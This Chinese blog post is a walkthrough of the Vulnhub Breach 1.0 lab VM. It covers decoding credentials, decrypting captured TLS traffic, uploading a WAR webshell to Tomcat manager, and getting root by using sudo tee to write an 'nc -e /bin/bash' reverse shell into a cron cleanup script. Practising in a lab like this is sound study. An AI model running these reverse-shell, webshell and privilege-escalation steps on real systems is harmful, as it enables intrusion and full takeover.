Vulnhub靶场渗透-Breach1.0

最新推荐文章于 2023-12-11 20:35:20 发布
最新推荐文章于 2023-12-11 20:35:20 发布
阅读量1.5k 收藏 5
点赞数 4
分类专栏: Vulnhub渗透靶场学习 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/120138744
版权

Vulnhub简介

Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞
需要使用VMware或VirtualBox 运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的 root 权限和查看 flag

https://www.vulnhub.com/

Breach1.0靶机信息

breach1.0 是一个难度初级到中级的Boot2Root/CTF挑战
静态ip(192.168.110.140),配置环境到同一个网段,我用的kali (192.168.110.128)来进行渗透

下面开始

信息收集

端口简单扫一下,好家伙基本上端口都是开放的,肯定是有问题的
在这里插入图片描述
访问192.168.110.140的 80 端口进入web页面
在这里插入图片描述
谷歌翻译了一下,哈哈哈
在这里插入图片描述

漏洞挖掘

1、右键查看首页源码,注意到注释很可疑,是一段base64 编码
在这里插入图片描述
两次解码得到一串账号密码
在这里插入图片描述
2、首页图片可以点击跳转,其他几个页面都是图片啥的,最后一个是 impresscms登录页
在这里插入图片描述
在这里插入图片描述
既然是登录页,那就用之前得到的账号密码尝试登录,登录成功,注意到有三封邮件
在这里插入图片描述
邮件三发现保存一个SSL证书,访问下载一个SSL证书的密钥库keystore,keystore是储存公私钥的一种文件格式
在这里插入图片描述
3、返回到左边的功能菜单,挨个查看了一下,profile 目录也看了一下,没发现什么漏洞
在这里插入图片描述
但找到一个很可疑的SSL,想到之前拿到的SSL密钥库,就点进去看了
在这里插入图片描述
在这里插入图片描述
谷歌翻译了一下
在这里插入图片描述
得到storepassword and keypassword are all set to 'tomcat'.,提到了无法读取文件很有可能就是流量包被前面的SSL加密了
访问下载流量包,wireshark打开应该是加密了流量
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
4、成功导出 .p12 证书,然后就是把他导入到wireshark,导入证书后HTTPS被解密,查看流量包
可以看到原来的一些TLS加密的变成了HTTP
最新版wireshark已经 把SSL 改为 TLS,其实SSL/TLS 都已统称通信加密协议
在这里插入图片描述
看样子像是被挂了图片马,执行了cmd
在这里插入图片描述
追踪http流,获得Tomcat后台登录地址http://192.168.110.140:8443/_M@nag3Me/html
采用http basic 认证,包含了用户名和密码的数据包 Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
base64 解码得到tomcat:Tt\5D8F(#!*u=G)4m7zB

在这里插入图片描述
在这里插入图片描述
然后就是去访问Tomcat 后台登录
在这里插入图片描述
Tomcat后台的 getshell 有标准姿势,上养马场,准备好jsp版本的各种吗,像cmd小马,菜刀马,jspspy大马,打包成 .zip ,在改成 .war,上传部署
在这里插入图片描述
5、发现问题,用菜刀去连,一会儿就会断开,文件被删除,需要重新上传 war 包,猜测主机可能有杀软或者杀webshell的工具
解决方法,用bash反弹一个shell给我们
可以看我的另一篇文章
Linux反弹shell

查看当前系统用户 cat /etc/passwd ,注意到两个值的关注的用户,root就不用说了,我们关注的主要是有bin/bash权限的用户
在这里插入图片描述
进到网站根目录发现两个很长的文件名的php文件,打开看是数据库的连接文件,用户是 root 密码是空
在这里插入图片描述
登录mysql数据库,查询user表,拿到milton的密码MD5 thelaststraw在这里插入图片描述
在这里插入图片描述
提权到 milton用户
在这里插入图片描述
查看历史命令,看到su blumbergh,需要找到这个用户的密码
在这里插入图片描述
在根目录下有6张图片,用 exiftool 查看详细信息,在bill.png 下看到可疑的注释coffeestains
在这里插入图片描述
在这里插入图片描述
6、尝试登录blumbergh,提权成功,历史命令里发现有可疑文件
在这里插入图片描述
进入这个文件,这是个清理脚本,每三分钟执行清理删除webapps目录下的所有文件,所以之前的菜刀一直会断连就是被清理了
在这里插入图片描述
sudo -l查看sudo 权限,发现能够以 root权限执行 tee 和 tidyup.shtee 命令用于读取标准输入的数据,并将其内容输出成文件,tidyup.sh就是清理脚本
在这里插入图片描述
7、想法就是利用 tee 以 root的权限向清理脚本写入反弹 shell,拿到 root权限

nc反弹shell
echo "nc -e /bin/bash 192.168.110.128 4444" > shell.txt

使用 tee命令将shell.txt写到 清理脚本
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看是否写入
cat /usr/share/cleanup/tidyup.sh
在这里插入图片描述
成功写入,nc监听等待反弹shell,root权限
在这里插入图片描述
查看隐藏文件,打开 flag.txt ,通关
在这里插入图片描述

总结

也是第一次写这种渗透的练习靶场,遇到了很多的坑,比如说各种环境的奇怪报错,linux操作不熟等等很多问题

通过查阅文档资料一个一个问题复现解决也学到了很多,还会继续练习记录靶场学习

道路是曲折的,回首是牛逼的

哈哈哈

paidx0
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
vulnhub】---Breach-1.0靶机
qq_43168364的博客
08-22 996
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:Breach-1.0靶机(192.168.110.140) 攻击机:kali Linux(192.168.15.129) 物理机IP:192.168.110.220 相关配置 由于该靶机用的是静态的ip,我们要访问的话需要改变主机的IP和他处于同一个网端,为了让物理机还可以访问互联网,我们给物理机添加上两个网卡 这样就OK了 二、信息收集 主机发现 该靶机已知IP地址无需主机发现 端
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2705
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
Vulnhub靶场Breach1.0详解
m0_65712192的博客
02-14 1151
Vulnhub靶场Breach1.0详解
渗透训练:Vulnhup-Breach1.0
weixin_43563134的博客
05-18 55
一、介绍: Breake 1.0是一个初级到中级Boot to Root/CTF挑战.通过坚持不懈的信息收集从而来解决问题。 二、环境: 目标机:虚拟机配置了一个静态IP地址(192.168.110.140),因此您需要将仅主机适配器配置到此子网。 攻击机:kali ip在目标机同网段下,ip地址192.168.110.126. 三、渗透过程: 1)检查目标机是否可以ping通: 2)信息收集 使用nmap扫描端口,查看那些端口开放。命令:nmap -v -A 192.168.110.140 可以发现所有的
Breach 1.0 靶机
weixin_51559599的博客
10-21 172
TLS 加密证书、.keystore 文件浏览器指明网页 https 证书不可信可使用 bp 拦截代理解决Tomcat Manager 上传 msf 生成的 .war 木马实现 webshelltee。
Breach 1.0
最新发布
weixin_44770698的博客
12-11 178
靶场练习
vulnhub-Breach_1.0
HEAVEN569的博客
06-28 1158
vulnhub-Breach_1.0内网主机渗透测试
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1295
vulnhub靶机AI-Web-1.0渗透笔记
VulnHubBreach1.0[渗透测试]新手必看
qq_60115503的博客
09-02 502
将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透,阅读readme.txt作为多部分系列的第一部分,Breach 1.0 旨在从初学者到中级 boot2root/CTF 挑战。解决问题将结合可靠的信息收集和持久性。不遗余力。VM 配置有静态 IP 地址 (192.168.110.140),因此您需要将仅主机适配器配置到此子网。如果您遇到任何问题,您可以在 Twitter 上找到我:https://twitter.com/mrb3n813 或在#vulnhub 的 IRC 上。
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7035
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Breach-1.0.zip
08-21
Breach-1.0.zip
email-breach
04-01
包含我在进行渗透测试时个人丢弃的所有电子邮件 我已删除所有在转储中多次出现的重复电子邮件 随时欢迎您添加更多电子邮件并扩展列表。 在将重复项添加到此列表之前,请确保将其删除。 记住,我个人不能保证这些电子...
SCP-Contaiment-Breach
03-20
SCP-Contaiment-Breach
一起打靶-Breach-2-final2.1.xss上线
09-28
一起打靶-Breach-2-final2.1.xss上线
hull-breach:由Godot 3.0.2制成的2D街机射击游戏,具有水下设置
05-08
2D街机射击游戏,带有水下设置,由Godot 3.0.2制成。
0宽字符加密_vulnhub实战靶场攻略:Breach 1.0
weixin_39969611的博客
11-21 320
项目介绍VulnHub是一个面向所有人开放的黑客游戏靶场练习平台,里面有好多锻炼黑客技术,学习黑客技术的游戏虚拟机供所有人下载攻打,里面大部分靶场主机都是需要控制虚拟机,获得主机的最高权限才算挑战成功,只要下载相关镜像,在相关虚拟机软件上面运行就可以进行游戏了。游戏目标本次靶场名为Breach 1.0之后还有Breach 2.0和Breach 3.0为中等难度的渗透练习靶场,目标是通过收...
vulnhub靶机通关)Breach系列:breach-1.0
yang1234567898的博客
01-22 4217
靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 环境配置 根据作者描述,靶机配置了一个静态IP地址(192.168.110.140),需要仅主机适配器配置此子网 配置仅主机网卡为DHCP,子网地址192.168.110.0 注意:类型为仅主机的网卡才可以 VMware适配器改成以下地址 靶机和kali网络选仅主机模式 确实环境是否配置好 环境搞好,直接开干! 信息收集 扫端口 扫描.
Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透
weixin_48991458的博客
11-16 5561
菜鸡的第一篇学习分享 ——Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透 关于Vulnhub:Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。https://www.vulnhub.com/ 根据Vulnhub的要求是要拿到root权限和5个flag,有了大体思路。(Vulnhub每个靶机上都有相应的提示,这一点很良心!) 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 靶机难度:入门 靶机描述:DC-1
一次失败的vulnhub靶机渗透之breach1.0
weixin_44255856的博客
08-06 1385
靶机地址下载https://pan.baidu.com/s/1KuwK_8MqCWhcIcNpTJ-OLQ 这是靶机的介绍 在一个由多个部分组成的系列文章中,Breach 1.0是一个初学者到中级boot2root/CTF挑战。解决问题需要扎实的信息收集和坚持不懈的努力。千方百计。 VM配置了一个静态IP地址(192.168.110.140),因此您需要将您的主机专用适配器配置到这个子网。 非常...
putty WARNING - POTENTIAL SECURITY BREACH!
07-27
回答: 当您在使用PuTTY时,如果看到"WARNING - POTENTIAL SECURITY BREACH!"的警告信息,这可能是由于几种原因引起的。首先,这可能是因为您连接的服务器使用了较低的加密算法,而PuTTY检测到这可能存在安全风险。这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值